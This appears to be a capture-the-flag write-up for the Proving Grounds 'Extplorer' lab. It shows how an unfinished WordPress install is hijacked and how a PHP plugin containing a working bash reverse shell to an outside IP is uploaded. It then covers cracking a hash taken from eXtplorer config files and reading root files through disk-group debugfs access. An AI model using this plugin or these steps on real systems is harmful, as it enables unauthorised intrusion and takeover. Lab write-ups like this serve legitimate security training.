Extplorer - Proving Grounds Practice
Enumeration
Nmap
Initial Nmap scan revealed SSH and HTTP ports were open.
WEB Enumeration
When visited port 80, I found that there was a wordpress installation running.
So I created a MySQL database using below docker command:
sudo docker run --name db-mysql -e MYSQL_ROOT_PASSWORD=rootpass -e MYSQL_DATABASE=wordpress -e MYSQL_USER=dbuser -e MYSQL_PASSWORD=dbpassword -p 3306:3306 -d mysql:latest
Then set the site’s db to my db.
And then ran the installation.
Set the username to admin and password to admin.
Waited for site to install.
Then I simply logged in to admin dashboard.
Exploitation
(1st way) Custom Plugin RCE
I created a custom plugin as seen below:
<?php
/**
* Plugin Name: Wordpress Reverse Shell
* Author: mto
*/
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.249/8080 0>&1'")
?>
And zipped it.
Then uploaded it to wordpress.
And when I activated the plugin I got a reverse shell.
(2nd Way) Extplorer File Upload to RCE
Instead of setting up wordpress site, we could run fuzzing tools to detect filemanager endpoint which was running eXtplorer site.
We could the simply upload a reverse shell to web root.
Then get a reverse shell.
Lateral Movement
Extplorer Configs
While searching website folders I found filemanager folder which was running Extplorer website. So I checked config files and found filemanager/config/.htusers.php file. It included dora’s hash.
Blowfish Crack
I used rockyou.txt to crack it and it worked.
I got the user flag.
Privilege Escalation
Disk Group
The dora user was in disk group.
This group is dangerous as we can use debugfs to access all filesystem without needing any permissions. At first I ran df -h to find which mount is mounted to the / (root) filesystem.
Then I used debugfs to access the root directory and read root flag.